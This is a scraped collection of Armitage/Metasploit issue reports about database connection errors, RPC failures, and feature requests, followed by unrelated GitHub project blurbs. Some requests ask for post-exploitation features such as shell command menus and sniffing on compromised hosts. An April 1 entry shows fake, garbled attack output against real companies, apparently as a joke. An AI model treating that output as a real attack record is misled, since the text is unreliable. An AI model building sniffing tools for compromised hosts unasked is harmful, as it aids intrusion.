but don´t start the exploit. The bottom from atack don´t work
Original issue reported on code.google.com by [email protected]
on 2 Apr 2011 at 2:54
What steps will reproduce the problem?
1.Can not run the framework postgresql service on windows 7
2.
3.
What is the expected output? What do you see instead?
when i start armitage on windows 7 click to start MSF appear a message "using
db driver postgresql" ok "unable to connect to db make sure it running'.Go to
services frameworkpostgresql click right > properties > start ,message "the
operation could not be completed.the system cannot find the path specified
What version of Metasploit are you using (type: svn info)? On which
operating system? metasploit 3.6.0
Which database are you using?
postgreSQL
Please provide any additional information below.
Original issue reported on code.google.com by [email protected]
on 23 Mar 2011 at 5:47
Armitage has the ability to read the stdout ramblings of msfrpcd when launched
from Armitage (via the Start MSF button). It would be helpful to have the
msfrpcd output available within Armitage.
If msfrpcd was started via Armitage, add an "MSF-RPC Console" item to the View
menu.
This item would open up a tab in Armitage where messages printed to stdout are
collected and displayed.
I'd use this to see the progress of my nmap scans.
Original issue reported on code.google.com by [email protected]
on 7 Dec 2010 at 11:04
Armitage knows what OS it's dealing with when there's a shell open. This could be put to good use. I'd like to see popup menus in the command shell portion with, here are some ideas:
*NIX:
Upload file... # uses echo to upload a file
Windows:
... do various popular command line things ...
Original issue reported on code.google.com by [email protected]
on 9 Dec 2010 at 10:54
What steps will reproduce the problem?
U start up the mysql ana everything else but wen u try to connect to an
instance it gives the below error message. Kinda connected to the mysql.com hack
What is the expected output? What do you see instead?
Factoring..........[*] Scanning RSA tokens for usable seed.....[*] Logging into
vault.rsa.com as 'rivest'......[*] Launching SQL injection attack against MySQL.
com....[*] Extracting passwords hashes....[*] Replaying SHA1 hashes against
Sun.
com.......[*] Attaching to Stuxnet through Oracle Command
Center....!#$#$@#$$puT
T
Y!
@$
@vault
.rsa.com
# #@pu
TTY#$@#..@#$@34 msf>.. ui
d=0(root) gid=0(root) g
roups=0(root) @#$@#42 3m
sf>bash-4.1#
What version of Metasploit are you using (type: svn info)? On which
operating system?
msf3 on bt4 r2
Which database are you using?
mysql
Please provide any additional information below.
Original issue reported on code.google.com by [email protected]
on 1 Apr 2011 at 3:13
Attachments:
What steps will reproduce the problem?
1. /etc/init.d/mysql start
2. msfrpcd -f -U msf -P test -t Basic
3. /opt/armitage/armatige.sh
4. Enter info and click "Connect"
What is the expected output? What do you see instead?
A message box opens with the error "[-] Invalid driver specified" Armitage then
seems to try to connect to postgresql and of course fails.
What version of Metasploit are you using (type: svn info)? On which
operating system?
$ svn info
Path: .
URL: https://metasploit.com/svn/framework3/trunk
Repository Root: https://metasploit.com/svn
Repository UUID: 4d416f70-5f16-0410-b530-b9f4589650da
Revision: 11229
Node Kind: directory
Schedule: normal
Last Changed Author: scriptjunkie
Last Changed Rev: 11229
Last Changed Date: 2010-12-05 14:06:28 -0600 (Sun, 05 Dec 2010)
$ uname -a
Linux zuul 2.6.35-23-generic #41-Ubuntu SMP Wed Nov 24 11:55:36 UTC 2010 x86_64
GNU/Linux
Ubuntu 10.10 64 bit
Which database are you using?
$ mysql --version
mysql Ver 14.14 Distrib 5.1.49, for debian-linux-gnu (x86_64) using readline
6.1
Original issue reported on code.google.com by [email protected]
on 5 Dec 2010 at 10:19
What steps will reproduce the problem?
1. exploit a client
2. try tunning the console and run some command!
3. Error!
What is the expected output? What do you see instead?
I expect it to run the command in the windows console! instead i get an error...
What version of Metasploit are you using (type: svn info)? On which
operating system?
The download on the newest metasploit (Svn:1165) using the download of armitage
from fastandeasyhacking.com for windows!
Which database are you using?
the second one, postgresql
Please provide any additional information below.
error message: Invalid source file specified: C:framework1msf3command.txt
Original issue reported on code.google.com by [email protected]
on 22 Jan 2011 at 12:39
What steps will reproduce the problem?
1. when scanning for host
2. when finding attacks
3. anything that involves use of the program after opening it.
What is the expected output? What do you see instead?
"Something went wrong:
Tried: @(msf.RpcConnection@1f7cdc7, 'console.destory', '0')
Error:
java.lan.RuntimeExectpion: Error reading response.
and
"Something went wrong:
Tried: @(msf.RpcConnection@1f7cdc7, 'db.status')
Error:
java.lan.RuntimeExectpion: Error reading response.
What version of Metasploit are you using (type: svn info)? On which
operating system?
metasploit v3.5.1-release
Backtrack R2
java version "1.6.0_23"
Which database are you using?
Please provide any additional information below.
Original issue reported on code.google.com by [email protected]
on 14 Dec 2010 at 9:50
What steps will reproduce the problem?
1 starting msfrpcd
2.starting configured mysql-server
3.trying to connect
What is the expected output? What do you see instead?
[*]Using database driver mysql
___
Unable to connect to database.
Make sure its running.
___
[-]Error while running command db_connect: Failed to connect to the
database:uninitialized constant MysqlCompat::MysqlRes
Call Stack:
[...]
What version of Metasploit are you using (type: svn info)? On which
operating system?
Linux Mint 10(>>Ubuntu 10.10); metasploit version 3.5
Which database are you using?
mysql
Please provide any additional information below.
read that there is an issue with ruby gems..
Original issue reported on code.google.com by [email protected]
on 8 Dec 2010 at 11:45
Add "start sniffing" option for compromised hosts
Original issue reported on code.google.com by [email protected]
on 24 Feb 2011 at 9:24
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.